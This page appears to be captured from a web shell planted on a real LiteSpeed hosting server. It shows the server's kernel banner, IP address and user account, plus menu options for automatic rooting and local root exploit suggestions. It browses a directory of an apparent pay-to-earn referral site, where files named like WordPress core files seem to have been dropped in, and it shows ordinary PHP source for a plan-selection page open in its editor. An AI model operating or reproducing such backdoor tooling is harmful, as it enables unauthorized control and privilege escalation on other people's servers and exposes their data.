Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
user /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
AssignmentWorkZone.apk
19.5
MB
-rw-r--r--
2026-03-28 16:09
assignment.php
20.18
KB
-rw-r--r--
2026-03-31 10:04
checkout.php
10.61
KB
-rw-r--r--
2026-03-13 17:01
dashboard.php
10.53
KB
-rw-r--r--
2026-03-31 10:21
history.php
3.6
KB
-rw-r--r--
2026-03-12 12:52
logout.php
91
B
-rw-r--r--
2026-03-11 23:27
pending.php
4.56
KB
-rw-r--r--
2026-03-12 01:29
plan-current.php
2.55
KB
-rw-r--r--
2026-03-11 23:27
profile.php
5.04
KB
-rw-r--r--
2026-03-28 15:45
referral-commissions.php
6.07
KB
-rw-r--r--
2026-03-12 00:37
referral.php
8.61
KB
-rw-r--r--
2026-03-28 15:31
select-plan.php
3.4
KB
-rw-r--r--
2026-03-11 23:27
support.php
12.43
KB
-rw-r--r--
2026-03-12 13:23
team-commission.php
2.82
KB
-rw-r--r--
2026-03-12 12:52
team-details.php
4.46
KB
-rw-r--r--
2026-03-12 15:31
withdraw-history.php
3.53
KB
-rw-r--r--
2026-03-12 12:52
withdraw.php
8.18
KB
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php require_once '../includes/config.php'; if (!isset($_SESSION['user_id'])) { header("Location: ../login.php"); exit; } // Redirect if already active $stmt = $pdo->prepare("SELECT status FROM users WHERE id = ?"); $stmt->execute([$_SESSION['user_id']]); $user_status = $stmt->fetchColumn(); if ($user_status === 'active') { header("Location: dashboard.php"); exit; } // Check if user has a pending deposit $dep_stmt = $pdo->prepare("SELECT status FROM deposits WHERE user_id = ? AND status = 'pending'"); $dep_stmt->execute([$_SESSION['user_id']]); if ($dep_stmt->rowCount() > 0) { header("Location: pending.php"); exit; } $stmt = $pdo->query("SELECT * FROM plans ORDER BY price ASC"); $plans = $stmt->fetchAll(); require_once '../includes/header.php'; ?> <div style="padding-top:100px;"> <section> <h2 class="section-title">Select Your Plan</h2> <p style="text-align:center; color:var(--text-muted); margin-top:-30px; margin-bottom:50px;"> Choose a plan to activate your account and start earning. </p> <?php if (count($plans) > 0): ?> <div class="grid"> <?php foreach ($plans as $plan): ?> <div class="card <?php echo $plan['is_premium'] ? 'premium-card' : ''; ?>"> <h3><?php echo htmlspecialchars($plan['name']); ?></h3> <div class="price"> <span style="font-size:1.2rem;">Rs</span> <?php echo number_format($plan['price'], 2); ?> </div> <p style="color:var(--text-muted); margin-bottom:15px;"> <?php if ($plan['validity_type'] == 'lifetime') { echo "Lifetime Validity"; } else { echo htmlspecialchars($plan['validity_days']) . " Days Validity"; } ?> </p> <div style="margin-bottom:20px; font-weight:600; color:var(--primary-color);"> Earn Rs <?php echo number_format($plan['assignment_pay'], 2); ?> per assignment </div> <ul style="border-top:1px solid rgba(255,255,255,0.05); padding-top:20px;"> <?php $features = explode("\n", $plan['features']); foreach ($features as $feature): $feature = trim($feature); if (!empty($feature)): ?> <li><?php echo htmlspecialchars($feature); ?></li> <?php endif; endforeach; ?> </ul> <a href="checkout.php?plan_id=<?php echo $plan['id']; ?>" class="btn-primary" style="width:100%;">Select Plan</a> </div> <?php endforeach; ?> </div> <?php else: ?> <div style="text-align:center; padding:50px; background:var(--card-bg-dark); border-radius:var(--border-radius);"> <i class="fas fa-box-open" style="font-size:3rem; color:var(--text-muted); margin-bottom:20px;"></i> <p>No investment plans have been created yet. Please check back soon.</p> </div> <?php endif; ?> </section> </div> <?php require_once '../includes/footer.php'; ?>